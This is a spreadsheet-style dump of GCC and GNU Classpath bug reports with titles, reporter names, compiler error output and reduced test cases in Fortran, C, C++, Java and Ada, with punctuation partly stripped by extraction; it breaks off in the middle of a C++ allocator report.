The test case below doesn't go through the linker.
The error message is:
&gt; gfortran -c -ffree-form module.f test.f
&gt; gfortran -o test test.o module.o
module.o: In function `__module_mysubclass_MOD_init':
module.f:(.text+0x19): undefined reference to `vtab$inner.1586'
module.f:(.text+0x25): undefined reference to `vtab$inner.1586'
module.f:(.text+0x2e): undefined reference to `vtab$inner.1586'
collect2: ld a retournÃ© 1 code d'Ã©tat d'exÃ©cution
(note that combining the two following files into a single one creates a segfault #44064)
file module.f:
module module_myclass
    implicit none
    type :: inner
    contains
        procedure :: set
    end type inner
    type :: myclass
        type(inner) :: slice
    end type myclass
contains
    subroutine set(this)
        class(inner) intent(inout) :: this
    end subroutine set
end module module_myclass
module module_mysubclass
    use module_myclass only : myclass
    implicit none
    type extends(myclass) :: mysubclass
    contains
        procedure :: init
    end type mysubclass
contains
    subroutine init(this)
        class(mysubclass) intent(inout) :: this
        call this%slice%set() ! XXX PROBLEM HERE this%slice not resolved
    end subroutine init
end module module_mysubclass
and file test.f:
program test
    use module_mysubclass only : mysubclass
    implicit none
    class(mysubclass) allocatable :: obs
end program test</t>
  </si>
  <si>
    <t>pchwood</t>
  </si>
  <si>
    <t>GCC-5830</t>
  </si>
  <si>
    <t>The compiler crashes</t>
  </si>
  <si>
    <t>The compiler crashes when compilling this large file:
Release:
unknown
Environment:
[bigloo@redrock bigloo2.4d]$ uname -a
Linux redrock.inria.fr 2.4.8-26mdksmp #1 SMP Sun Sep 23 16:04:21 CEST 2001 i686 unknown
[bigloo@redrock bigloo2.4d]$ gcc-3.0.1 --version
3.0.1
How-To-Repeat:
gcc-3.0.1 -O2 bug.c</t>
  </si>
  <si>
    <t>manuel.serrano</t>
  </si>
  <si>
    <t>GCC-40965</t>
  </si>
  <si>
    <t>[4.5 Regression][graphite] slow compilation</t>
  </si>
  <si>
    <t>the attached testcase compiles in about 3s with
gfortran -c  -ffree-form -O3 -ffast-math -ftree-vectorize -funroll-loops -march=native -ftime-report bug.f90
but requires about 130s adding -fgraphite-identity to the options
GRAPHITE loop transforms: 123.82 (97%) usr   0.59 (89%) sys 124.37 (97%) wall    2262 kB ( 7%) ggc</t>
  </si>
  <si>
    <t>GCC-939</t>
  </si>
  <si>
    <t>sparc Solaris 2.6 gcc 2.95.2 exits with unrecognizable insn ice for legal code</t>
  </si>
  <si>
    <t>GCC 2.95.2 running as a native compiler on sun4m sparc under
Solaris 2.6 exits with ICE compiling legal code (pine4.30/imap/src/osdep/unix/mbx.c
from UW PINE 4.30).  The same code compiles and links to a
working executable using native sparc Solaris 2.6 gcc 2.8.1
but fails for gcc 2.95.1 as well.  The error occurs at all
levels of optimization from -O0 to -O6 (incl.) gcc 2.8.1
compiles the source successfully at all levels of optimization
(from -O0 to -O6 incl.).
The gcc 2.95.2 binaries were compiled on the same machine
using gcc 2.95.1 for the original bootstrap (make bootstrap-lean).
The sources were checked out from the public CVS repository at gnu.org using tag gcc-2_95_2-release:
cvs -z 9 -d :pserver:anoncvs@gcc.gnu.org:/cvs/gcc co -r gcc-2_95_2-release -P gcc
Attached are:
mbx.i.gz: the preprocessed source file generated by gcc 2.95.2 (gzipped)
mbx.c.rtl.2.8.1.gz: the RTL generated by gcc 2.8.1 with option -O0 (gzipped)
mbx.c.rtl.2.95.2.gz: the RTL generated by gcc 2.95.2 with option -O0 (gzipped)
The erroneous run produced the output included below:
Reading specs from local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2
/specs
gcc version 2.95.2 19991024 (release)
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/cpp -lang-c -v -D
__GNUC__=2 -D__GNUC_MINOR__=95 -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__spar
c__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem
(unix) -Asystem(svr4) -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) mbx.c
mbx.i
GNU CPP version 2.95.2 19991024 (release) (sparc)
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../sparc
-sun-solaris2.6/include
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/../../../../include/g++-3
End of omitted list.
 local/lib/gcc-lib/sparc-sun-solaris2.6/2.95.2/cc1 mbx.i -quiet
-dumpbase mbx.c -version -o mbx.s
GNU C version 2.95.2 19991024 (release) (sparc-sun-solaris2.6) compiled by GNU C
 version 2.95.2 19991024 (release).
mbx.c: In function `mbx_hdrpos':
mbx.c:1371: internal error--unrecognizable insn:
(insn 102 100 104 (set (reg:SI 130)
        (minus:SI (const_int 4 [0x4])
            (const_int -4096 [0xfffff000]))) -1 (nil)
    (nil))
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS 5.6 Generic_105181-20 sun4m sparc SUNWSPARCstation-20
cpu0: TITMS390Z50 (mid 8 impl 0x0 ver 0x3 clock 50 MHz)
How-To-Repeat:
Use the preprocessed source attached to the message.</t>
  </si>
  <si>
    <t>georgi</t>
  </si>
  <si>
    <t>GCC-82022</t>
  </si>
  <si>
    <t>constexpr lambda in template context: expression â€˜â€™ is not a constant expression</t>
  </si>
  <si>
    <t>Created attachment 42073
source code
in a template context a constexpr lambda doesn't seem to be able to be constexpr evaluated and its result is not constexpr.
if constexpr ([]() constexpr {return true}()) //expression â€˜â€™ is not a constant expression
constexpr bool r = []() constexpr {return true}()
if constexpr (r) //r used in its own initializer</t>
  </si>
  <si>
    <t>bastien.penavayre</t>
  </si>
  <si>
    <t>GCC-2505</t>
  </si>
  <si>
    <t>including hash_map.h fails under g++ 3.0</t>
  </si>
  <si>
    <t>The g++ v3 stl headers have a broken hash_map.h:
In file included from foo.cc:1:
/usr/include/g++-v3/hash_map.h:31:32: bits/stl_hashtable.h: No such file or directory
Release:
unknown
How-To-Repeat:
g++ -O2 -Wall foo.cc -o foo</t>
  </si>
  <si>
    <t>terpstra</t>
  </si>
  <si>
    <t>GCC-24409</t>
  </si>
  <si>
    <t>ICE on module name vs dummy argument name</t>
  </si>
  <si>
    <t>If a dummy argument name is the same as the name of the module containing the interface an ICE (or other errors according to the test case) results.</t>
  </si>
  <si>
    <t>GCC-78575</t>
  </si>
  <si>
    <t>[7 Regression] ICE: in trunc_int_for_mode at explow.c:55 with -O2 -g</t>
  </si>
  <si>
    <t>Created attachment 40184
reduced testcase
Compiler output:
$ x86_64-pc-linux-gnu-gcc -O2 -g testcase.c -Wno-psabi
testcase.c: In function 'foo':
testcase.c:13:1: internal compiler error: in trunc_int_for_mode at explow.c:55
 }
 ^
0x900b60 trunc_int_for_mode(long machine_mode)
        /repo/gcc-trunk/gcc/explow.c:54
0x8f0bf8 gen_int_mode(long machine_mode)
        /repo/gcc-trunk/gcc/emit-rtl.c:495
0xc75475 simplify_binary_operation_1
        /repo/gcc-trunk/gcc/simplify-rtx.c:2399
0xc7c03d simplify_binary_operation(rtx_code machine_mode rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/simplify-rtx.c:2068
0xc7fd98 simplify_const_relational_operation(rtx_code machine_mode rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/simplify-rtx.c:5022
0xc8074c simplify_relational_operation(rtx_code machine_mode machine_mode rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/simplify-rtx.c:4578
0x84da11 cselib_expand_value_rtx_1
        /repo/gcc-trunk/gcc/cselib.c:1823
0x84e71e cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /repo/gcc-trunk/gcc/cselib.c:1530
0xf8b7dd vt_expand_var_loc_chain
        /repo/gcc-trunk/gcc/var-tracking.c:8326
0xf8b7dd vt_expand_loc_callback
        /repo/gcc-trunk/gcc/var-tracking.c:8488
0x84d7ea cselib_expand_value_rtx_1
        /repo/gcc-trunk/gcc/cselib.c:1684
0x84e71e cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /repo/gcc-trunk/gcc/cselib.c:1530
0xf8b7dd vt_expand_var_loc_chain
        /repo/gcc-trunk/gcc/var-tracking.c:8326
0xf8b7dd vt_expand_loc_callback
        /repo/gcc-trunk/gcc/var-tracking.c:8488
0x84d48a cselib_expand_value_rtx_1
        /repo/gcc-trunk/gcc/cselib.c:1722
0x84e71e cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /repo/gcc-trunk/gcc/cselib.c:1530
0xf8b7dd vt_expand_var_loc_chain
        /repo/gcc-trunk/gcc/var-tracking.c:8326
0xf8b7dd vt_expand_loc_callback
        /repo/gcc-trunk/gcc/var-tracking.c:8488
0x84d7ea cselib_expand_value_rtx_1
        /repo/gcc-trunk/gcc/cselib.c:1684
0x84e71e cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        /repo/gcc-trunk/gcc/cselib.c:1530
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-242931-checking-yes-rtl-df-extra-nobootstrap-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --disable-bootstrap --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-242931-checking-yes-rtl-df-extra-nobootstrap-nographite-amd64
Thread model: posix
gcc version 7.0.0 20161128 (experimental) (GCC) 
Tested revisions:
trunk r242931 - FAIL
6-branch r242029 - OK</t>
  </si>
  <si>
    <t>GCC-9547</t>
  </si>
  <si>
    <t>member type access not respected</t>
  </si>
  <si>
    <t>Right now gcj will let a subclass see member type defined
in a superclass even if that member type has default
access protection and the two classes are in different
packages.
For instance this code compiles but should not.
package one
import two.*
public class o extends t
{
  boolean doit(Object x)
  {
    return x instanceof Res
  }
}
package two
public class t
{
  class Res
  {
  }
}
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-7134</t>
  </si>
  <si>
    <t>Athlon: ICE in extract_insn at recog.c:2130</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with
gcc -march=athlon -O -c:
--------------------------snip here----------------------
void foo ()
{
  int i n
  for ( i=0 i&lt;n ++i )
    i=n^128
}
--------------------------snip here----------------------
The error message is:
bug.c: In function `foo':
bug.c:7: error: unrecognizable insn:
(insn 53 57 54 1 (nil) (parallel [
            (set (strict_low_part (reg:QI 0 al [58]))
                (xor:QI (reg:QI 0 al [58])
                    (const_int -128 [0xffffff80])))
            (clobber (reg:CC 17 flags))
        ]) -1 (insn_list 57 (nil))
    (expr_list:REG_UNUSED (reg:CC 17 flags)
        (nil)))
bug.c:7: internal compiler error: Internal compiler error in extract_insn at recog.c:2130
Please submit a full bug report [etc.]
The example compiles fine with gcc 3.1.
The example was created from a file (psout.i) from a
bug report of Sergei Pachkov (see PR 7063).
Release:
gcc 3.2 20020617
Environment:
i686-pc-linux-gnu
How-To-Repeat:
gcc -march=athlon -O -c bug.c</t>
  </si>
  <si>
    <t>GCC-35524</t>
  </si>
  <si>
    <t>[4.4 regression] Unconditional use of expl() in libgfortran</t>
  </si>
  <si>
    <t>The following applies to the March 7 snapshot under FreeBSD. I haven't tested it on other platforms. When I compile and link the following program:
PROGRAM test_exp
x = exp(1.0)
END PROGRAM test_exp
I get the message:
/usr/home/mrichmond/irun/bin/../lib/gcc/i386-unknown-freebsd7.0/4.4.0/../../../libgfortran.so: undefined reference to `expl'
collect2: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-38880</t>
  </si>
  <si>
    <t>[4.4 Regression] g++.dg/init/const7.C XFAILed</t>
  </si>
  <si>
    <t>We do not fold
    (long int) &amp;16B-&gt;y - 16</t>
  </si>
  <si>
    <t>GCC-46120</t>
  </si>
  <si>
    <t>[4.6 regression] g++.dg/ipa/ivinline-?.C</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 165780 gave
FAIL: g++.dg/ipa/ivinline-1.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-2.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-3.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-4.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-5.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-6.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-8.C scan-ipa-dump inline B::bar[^\n]*inline copy in int main
FAIL: g++.dg/ipa/ivinline-8.C scan-ipa-dump inline B::foo[^\n]*inline copy in int main
Revision 165771 is OK.</t>
  </si>
  <si>
    <t>CLASSPATH-25389</t>
  </si>
  <si>
    <t>File(new URI(file:./)) -&gt; java.lang.NullPointerException</t>
  </si>
  <si>
    <t>A regression in 4.1.0 which is not in 4.0.2 brings OOo java component registration to its knees. Sample source inline
import java.net.URI
import java.io.File
class myfirstprog
{
        public static void main(String args[])
        {
           URI uriObject = null
           try {
               uriObject = new URI(file:./)
           }
           catch (Exception e) {
           }
           System.err.println(urlObject is  + uriObject)
           File uriFile = null
           uriFile = new File(uriObject)
           System.err.println(uriFile is  + uriFile)
        }
}
output from 4.1.0 is...
urlObject is file:./
Exception in thread main java.lang.NullPointerException
   &gt;
output from 4.2.0 was...
urlObject is file:./
uriFile is .</t>
  </si>
  <si>
    <t>GCC-24505</t>
  </si>
  <si>
    <t>[gomp] Loop rejected with mixed types in predicate</t>
  </si>
  <si>
    <t>I get an error message for the following code snippet:
================================
void foo()
{
    long n = 10
    int i
#pragma omp for
    for (i = 0 i &lt; n ++i) 
}
================================
bug.c: In function 'foo':
bug.c:6: error: invalid controlling predicate
This happens with the C and the C++ frontend.
I'm not 100 % sure whether this is really a bug or not but
icc for example accepts it.</t>
  </si>
  <si>
    <t>GCC-1257</t>
  </si>
  <si>
    <t>libgcj-2.95 / mips-sgi-irix6.5 /  Cannot create libgcj.la</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Submitter reports that this bug is fixed in 2.95.1.
</t>
  </si>
  <si>
    <t>GCC-28908</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression]: fold_convert fails for Fortran operator</t>
  </si>
  <si>
    <t>This testcase coms from SPEC CPU 2006:
[hjl@gnu-25 wrf-1]$ cat foo.f90
      module foo
      use bar
      implicit none
      private
      type ESMF_Clock
        type(ESMF_Time)  :: CurrTime
      end type
      interface operator (+)
        function add (x y)
          use bar
          type(ESMF_Time) :: add
          type(ESMF_Time) intent(in) :: x
          type(ESMF_Time) intent(in) :: y
        end function add
      end interface
      contains
      subroutine ESMF_ClockAdvance(clock)
      type(ESMF_Clock) intent(inout) :: clock
      clock%CurrTime = clock%CurrTime + clock%CurrTime
      end subroutine ESMF_ClockAdvance
      end module foo
[hjl@gnu-25 wrf-1]$ cat bar.f90
      module bar
      implicit none
      public
      type ESMF_Time
        integer :: DD
      end type
      end module bar
[hjl@gnu-25 wrf-1]$ make
/export/build/gnu/gcc-last/build-x86_64-linux/gcc/gfortran -B/export/build/gnu/gcc-last/build-x86_64-linux/gcc/  -S -o bar.s bar.f90
/export/build/gnu/gcc-last/build-x86_64-linux/gcc/gfortran -B/export/build/gnu/gcc-last/build-x86_64-linux/gcc/  -S -o foo.s foo.f90
foo.f90: In function â€˜esmf_clockadvanceâ€™:
foo.f90:17: internal compiler error: in fold_convert at fold-const.c:2098
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [foo.s] Error 1</t>
  </si>
  <si>
    <t>GCC-7733</t>
  </si>
  <si>
    <t>Segmentation Fault with -ftest-coverage</t>
  </si>
  <si>
    <t>Compiling this with '-ftest-coverage -c' on SunOS/Solaris 5.6 causes:
longjmp.c:5: internal error: Segmentation Fault
#include 
static jmp_buf buf
void f(int i) { longjmp(buf i) }
Release:
gcc 3.1
Environment:
SunOS 5.6
../src-solaris_2_6-sparc/configure --prefix=/arm/sdt/tools/GNU/gcc/3_1 --exec-prefix=/arm/sdt/tools/GNU/gcc/3_1/solaris_2_6-sparc --program-suffix=-3_1 -v --with-dwarf2 --enable-version-specific-runtime-libs --with-gnu-as --with-as=/arm/sdt/tools/GNU/binutils/2_12/solaris_2_6-sparc/bin/as-2_12 --with-gnu-ld --with-ld=/arm/sdt/tools/GNU/binutils/2_12/solaris_2_6-sparc/bin/ld-2_12
How-To-Repeat:
gcc -ftest-coverage -c longjmp.c
Here's the .i file (after preprocessing):
# 1 longjmp.c
# 1 
# 1 
# 1 longjmp.c
# 1 /usr/include/setjmp.h 1 3 4
# 17 /usr/include/setjmp.h 3 4
#pragma ident @(#)setjmp.h	1.26	96/12/18 SMI 
# 1 /usr/include/sys/feature_tests.h 1 3 4
# 11 /usr/include/sys/feature_tests.h 3 4
#pragma ident @(#)feature_tests.h	1.13	97/06/26 SMI
# 20 /usr/include/setjmp.h 2 3 4
# 53 /usr/include/setjmp.h 3 4
typedef int jmp_buf[12]
extern int setjmp(jmp_buf)
#pragma unknown_control_flow(setjmp)
extern int _setjmp(jmp_buf)
#pragma unknown_control_flow(_setjmp)
extern void longjmp(jmp_buf int)
extern void _longjmp(jmp_buf int)
typedef int sigjmp_buf[19]
extern int sigsetjmp(sigjmp_buf int)
#pragma unknown_control_flow(sigsetjmp)
extern void siglongjmp(sigjmp_buf int)
# 2 longjmp.c 2
static jmp_buf buf
void f(int i) { longjmp(buf i) }</t>
  </si>
  <si>
    <t>GCC-6077</t>
  </si>
  <si>
    <t>[alpha-osf].s with -x assembler-with-cpp breaks mips-tfile</t>
  </si>
  <si>
    <t xml:space="preserve">	-x assembler-with-cpp does not cause the filename extension to 
change internally therefore the spec files fail to deal with .s files 
as if they were .S - this is specifically a problem with systems using 
mips-tfile.  In this case mips-tfile gets passed the original .s 
filename instead of the temporary output from cpp0 this causes 
mipstfile to fail if the input .s file contains preprocessor stuff.
	I am sure that similar problems could be had with other 
combinations of -x options but this one in particular causes problems 
for me.
Release:
3.2 20020318
Environment:
System: OSF1 applied.physics.usyd.edu.au V4.0 878 alpha
Machine: alpha
host: alphaev56-dec-osf4.0d
build: alphaev56-dec-osf4.0d
target: alphaev56-dec-osf4.0d
configured with: ../gcc/configure --prefix=/home/gareth --enable-threads
How-To-Repeat:
	Compile any assembly file with cpp information which ends in .s 
using -x assembler-with-cpp on a target which uses mips-tfile</t>
  </si>
  <si>
    <t>GCC-77826</t>
  </si>
  <si>
    <t>[7 Regression] ICE in decompose at wide-int.h:928 w/ -m64 -O2 and above</t>
  </si>
  <si>
    <t>At least gcc-7.0.0-alpha20160925 and gcc-7.0.0-alpha20161002 ICE when compiling the following reduced snippet at -O2 (-Os -O2 -Ofast):
void
fi(unsigned long int *v0 unsigned int ow int q2)
{
  if (ow + q2 != 0)
    if (q2 == 1)
    {
      *v0 |= q2
      q2 ^= *v0
    }
}
% x86_64-pc-linux-gnu-gcc-7.0.0-alpha20161002 -O2 -c cj0mr0fp.c
cj0mr0fp.c: In function 'fi':
cj0mr0fp.c:10:1: internal compiler error: in decompose at wide-int.h:928
 }
 ^
I cannot reproduce it w/ -m32 or w/ the same snapshot targeted against 32-bit BE powerpc.</t>
  </si>
  <si>
    <t>GCC-24726</t>
  </si>
  <si>
    <t>Gigi abort Code=508</t>
  </si>
  <si>
    <t>Ture-Andersens-dator:~/Documents/Privat/programutveckling/ada/sudoku ture$ gnatmake sudoku
gcc -c elements-sets.adb
+===========================GNAT BUG DETECTED==============================+
| 3.3 20040913 (GNAT for Mac OS X build 1650) (powerpc-unknown-darwin)     |
| Gigi abort Code=508                                                     |
| Error detected at elements-sets.adb:95:21                                |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| concatenated together with no headers between files.                     |
+==========================================================================+
Please include these source files with error report
elements-sets.adb
elements-sets.ads
elements.ads
compilation abandoned
gnatmake: elements-sets.adb compilation error
--------------------------------------------------------------------------------
--  *  Body name elements.sets.adb
--  *  Project name sudoku
--  *
--  *  Version 1.0
--  *  Last update 2005-11-06
--  *
--  *  Created by Ture Andersen on 2005-11-06.
--  *  Copyright (c) 2005 __MyCompanyName__.
--  *  GNAT modified GNU General Public License
--  *
--------------------------------------------------------------------------------
with ada.text_io use ada.text_io
with ada.unchecked_conversion
package body elements.sets is
    function member (e : element s : set) return boolean is
    begin
        return (set_of (e) and s) &gt; null_set
    end
    function member (e : element s : set) return Natural is
        c : constant array (boolean) of natural :=
            (false =&gt; 0 true =&gt; 1)
    begin
        return c (member (e s))
    end
    function cardinality (s : set) return natural is
        C : natural := 0
    begin
        for e in element loop
            c := c + member (e s)
        end loop
        return c
    end cardinality
    function empty_set (s : set) return boolean is
    begin
        return s = null_set
    end empty_set
    function set_of (m : element) return set is
        function uc is new ada.unchecked_conversion
            (Source =&gt; element
            Target =&gt; set)
    begin
        return uc (m)
    end set_of
    function union (l r : element) return set is
    begin
        return set_of (l) or set_of (r)
    end union
    function union (L : element R : set) return set is
    begin
        return set_of (L) or R
    end union
    function union (L : set R : element) return set is
    begin
        return L or set_of (R)
    end
    function union (L R : set) return set is
    begin
        return L or R
    end
    function disjoint (l r : set) return boolean is
    begin
        return (l and r) = null_set
    end disjoint
    function proper_subset (subset the_set : set) return boolean is
    begin
        return 
            ((subset and the_set) = subset) and then
            (subset &lt; the_set)
    end proper_subset
    function improper_subset (subset the_set : set) return boolean is
    begin
        return (subset and the_set) = subset
    end improper_subset
    function intersection (l r : set) return set is
    begin
        return l and r
    end
    function complement (s : set) return set is
    begin
        return (not s) and universal_set
    end complement
    function difference (l r : set) return set is
    begin
        return l - (l and r)
    end difference
    function image (s : set) return string is
        i : string (int (one) .. int (nine)) := (others =&gt; ' ')
    begin
        for m in element loop
            if (set_of (m) and s) &gt; 0 then
                i (int (m)) := image (m)
            end if
        end loop
        return i
    end image
end elements.sets
--------------------------------------------------------------------------------
--  *  Spec. name elements.sets.ads
--  *  Project name sudoku
--  *
--  *  Version 1.0
--  *  Last update 2005-11-06
--  *
--  *  Created by Ture Andersen on 2005-11-06.
--  *  Copyright (c) 2005 __MyCompanyName__.
--  *  All rights reserved.
--  *    or (keep only one line or write your own)
--  *  GNAT modified GNU General Public License
--  *
--------------------------------------------------------------------------------
package elements.sets is
    type set is private
    null_set : constant set
    universal_set : constant set
    function set_of (m : element) return set
    function image (s : set) return string
    function union (l r : element) return set
    function + (l r : element) return set renames union
    function union (L : element R : set) return set
    function + (L : element R : set) return set renames union
    function union (L : set R : element) return set
    function + (L : set R : element) return set renames union
    function union (L R : set) return set
    function + (L R : set) return set renames union
    function member (e : element s : set) return boolean
    function member (e : element s : set) return Natural
    function empty_set (s : set) return boolean
    function disjoint (l r : set) return boolean
    function proper_subset (subset the_set : set) return boolean
    function improper_subset (subset the_set : set) return boolean
    function intersection (l r : set) return set
    function 
    function complement (s : set) return set
    function difference (l r : set) return set
    function - (l r : set) return set renames difference
private
    type set is mod 2 ** 16 - 1
    for set'size use 16
    null_set : constant set := 0
    universal_set : constant set := 16#1ff#
end elements.sets
--------------------------------------------------------------------------------
--  *  Spec name elements.ads
--  *  Project name sudoku
--  *
--  *  Version 1.0
--  *  Last update 2005-11-05
--  *
--  *  Created by Ture Andersen on 2005-11-05.
--  *  Copyright (c) 2005 __MyCompanyName__.
--  *  GNAT modified GNU General Public License
--  *
--------------------------------------------------------------------------------
package elements is
    type element is (one two three four five six seven eight nine)
    for element use 
        (one =&gt; 1 
        two =&gt; 2 
        three =&gt; 4 
        four =&gt; 8 
        five =&gt; 16 
        six =&gt; 32 
        seven =&gt; 64 
        eight =&gt; 128 
        nine =&gt; 256)
    for element'size use 16
        function image (m : element) return character
    function int (m : element) return integer
end elements
Ture Andersen
Zenon AB
besÃ¶ksadress Turebergs Torg 1
postadress 191 47 SOLLENTUNA
direkt 08 623 33 62
mobil 070 727 70 10
fax 08 35 02 90
www.zenon.se
ture.andersen@zenon.se</t>
  </si>
  <si>
    <t>ture.andersen</t>
  </si>
  <si>
    <t>GCC-1236</t>
  </si>
  <si>
    <t>java::io::FileDescriptor::available throws exception</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: apbianco-&gt;java-hacker
Responsible-Changed-Why: This probably isn't a compiler problem.
</t>
  </si>
  <si>
    <t>gfa</t>
  </si>
  <si>
    <t>GCC-31797</t>
  </si>
  <si>
    <t>[4.2/4.3 Regression] infinite loop in tree-ssa-pre or ICE</t>
  </si>
  <si>
    <t>When building RTEMS with gcc-4.2.0-20070430 gcc races on one file of the RTEMS sources. It consumes up all available CPU time gradually (very slowly) seems consume all memory and doesn't seem to finish:
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                    
 6176 joel      18   0 1614m 937m  604 D    2 92.9 491:53.20 cc1                  
# ps ax | grep cc1
 6176 ?        D    491:55 /opt/rtems-4.8/libexec/gcc/powerpc-rtems4.8/4.2.0/cc1 -quiet -imultilib m7400 -isystem ../../../../../.././mvme5500/lib/include -MD network_rel-GT64260eth.d -MF .deps/network_rel-GT64260eth.Tpo -MP -MT network_rel-GT64260eth.o -MQ network_rel-GT64260eth.o -DHAVE_CONFIG_H -D_KERNEL -Dmpc7455 -isystem ../../../../../.././mvme5500/lib/include ../../../../../../../../current/c/src/lib/libbsp/powerpc/mvme5500/network/GT64260eth.c -quiet -dumpbase GT64260eth.c -mcpu=7450 -mno-altivec -mabi=altivec -mvrsave=no -mmultiple -mstring -mstrict-align -ansi -auxbase-strip network_rel-GT64260eth.o -g -O2 -Wall -ansi -fasm -o -
This issue is reproduceable on i386-FC5 and FC6.
I would try to attach the *.i but bugzilla refuses to let to do so ATM. 
The same piece of code compiles fine with gcc-4.1.2 and older so I am inclined to call this to be a regression.</t>
  </si>
  <si>
    <t>ralf_corsepius</t>
  </si>
  <si>
    <t>GCC-6181</t>
  </si>
  <si>
    <t>Mauve Introspector.jdk11: getBeanInfo fail for AWT classes</t>
  </si>
  <si>
    <t>All Mauve Introspector.jdk11 getBeanInfo tests that involve awt classes have been added to the xfail list. Should be checked when the awt implementation is completed.
Release:
3.1
How-To-Repeat:
In your configured and compiled mauve obj dir do:
echo gnu.testlet.java.beans.Introspector.jdk11 | ./SimpleTestHarness</t>
  </si>
  <si>
    <t>GCC-56613</t>
  </si>
  <si>
    <t>[4.8 Regression] map::operator[](key_type&amp;&amp;) fails with custom allocator</t>
  </si>
  <si>
    <t>This program is valid in C++03 and C++11 but can't be compiled with trunk using -std=c++11
#include 
template
struct alloc
{
    typedef T value_type
    typedef T* pointer
    typedef const T* const_pointer
    typedef T
    typedef const T
    typedef unsigned size_type
    typedef int difference_type
    template
        struct rebind {
            typedef alloc other
        }
    alloc() { }
    template
        alloc(const alloc&amp;) { }
    pointer allocate(size_type n const void* = 0) { return std::allocator().allocate(n) }
    void deallocate(pointer p size_type n) { std::allocator().deallocate(p n) }
    size_type max_size() const { return -1 }
    void construct(pointer p const T }
    void destroy(pointer p) { p-&gt;~T() }
}
template
bool operator==(alloc alloc) { return true }
template
bool operator!=(alloc alloc) { return false }
int main()
{
    std::map alloc &gt; m
    m[1]
}
$ g++-4.8 -std=c++11 map.cc
In file included from /home/redi/gcc/4.x/include/c++/4.8.0/map:60:0
                 from map.cc:1:
/home/redi/gcc/4.x/include/c++/4.8.0/bits/stl_tree.h: In instantiation of 'std::_Rb_tree_node* std::_Rb_tree::_M_create_node(_Args _Key = int _Val = std::pair _KeyOfValue = std::_Select1st &gt; _Compare = std::less _Alloc = alloc &gt; std::_Rb_tree::_Link_type = std::_Rb_tree_node &gt;*]':
/home/redi/gcc/4.x/include/c++/4.8.0/bits/stl_tree.h:1662:64:   required from 'std::_Rb_tree::iterator std::_Rb_tree::_M_emplace_hint_unique(std::_Rb_tree::const_iterator _Args _Key = int _Val = std::pair _KeyOfValue = std::_Select1st &gt; _Compare = std::less _Alloc = alloc &gt; std::_Rb_tree::iterator = std::_Rb_tree_iterator &gt; std::_Rb_tree::const_iterator = std::_Rb_tree_const_iterator &gt;]'
/home/redi/gcc/4.x/include/c++/4.8.0/bits/stl_map.h:484:8:   required from 'std::map::mapped_type _Tp = int _Compare = std::less _Alloc = alloc std::map::mapped_type = int std::map::key_type = int]'
map.cc:41:8:   required from here
/home/redi/gcc/4.x/include/c++/4.8.0/bits/stl_tree.h:403:8: error: no matching function for call to 'alloc &gt; &gt;::construct(std::_Rb_tree_node &gt;*&amp; const std::piecewise_construct_t&amp; std::tuple std::tuple)'
        _M_get_Node_allocator().construct(__tmp
        ^
/home/redi/gcc/4.x/include/c++/4.8.0/bits/stl_tree.h:403:8: note: candidate is:
